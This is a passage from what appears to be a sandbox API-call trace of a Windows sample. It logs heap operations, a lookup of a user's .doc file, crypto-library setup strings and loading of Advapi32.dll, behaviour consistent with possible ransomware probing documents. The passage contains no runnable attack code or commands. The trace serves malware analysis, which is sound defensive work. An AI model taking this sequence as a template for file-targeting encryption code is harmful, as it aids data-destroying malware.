RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.178] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1jNOs4dsiatFwtPt-_j2.doc", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0650cc0, ftCreationTime.dwHighDateTime=0x1d5ee54, ftLastAccessTime.dwLowDateTime=0x4e3029d0, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x4e3029d0, ftLastWriteTime.dwHighDateTime=0x1d5ef02, nFileSizeHigh=0x0, nFileSizeLow=0xda0a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="1jNOs4dsiatFwtPt-_j2.doc", cAlternateFileName="1JNOS4~1.DOC")) returned 0xa87250 [0259.178] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.191] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.191] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.193] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.194] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.194] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.195] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.195] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.196] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.196] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.197] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 